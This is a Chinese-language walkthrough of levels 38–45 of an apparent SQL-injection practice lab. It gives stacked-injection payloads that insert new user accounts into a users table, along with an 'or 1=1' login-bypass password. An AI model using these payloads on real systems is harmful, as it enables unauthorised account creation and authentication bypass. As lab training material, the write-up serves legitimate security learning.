第三十八关
堆叠注入,单引号闭合。
可以用联合查询注入,
但是题目是堆叠注入所以用堆叠。向users表中插入一条用户信息:
?id=1';insert into users(id,username,password) values (20,'d38','d38'); --+
查看users表:
之所以可以使用堆叠查询是因为这里:
mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。
第三十九关
堆叠注入,也可联合注入,整数型。
第四十关
堆叠,也可联合,单引号括号闭合。
第四十一关
堆叠,也可联合,整数型。
第四十二关
利用堆叠注入加一条用户信息,单引号闭合。我用hackbar试了半天不行,最后在页面的文本框中写的语句就可以了。这关要在密码框写SQL语句,因为在源码中看到,它会对提交的用户名使用函数进行过滤,过滤掉特殊字符。
username:admin
password:1’;insert into users values(42,’d42’,’d42’);#
提交之后是错误页面,点home返回,然后输入我们刚才插入的账号和密码,发现成功登陆了。
除了使用堆叠注入,还可以使用万能密码登录,同样是在密码框写sql语句:
username:admin
password:1’ or 1=1 #
第四十三关
和42关思路一样,利用堆叠注入加一条用户信息,只不过这关是单引号括号闭合。
username:admin
password:1’);insert into users values(43,’d43’,’d43’);#
第四十四关
和第42关做法一模一样,也是单引号闭合。
username:admin
password:1';insert into users values(44,'d44','d44');#
第四十五关
和43关一模一样
username:admin
password:1');insert into users values(45,'d45','d45')#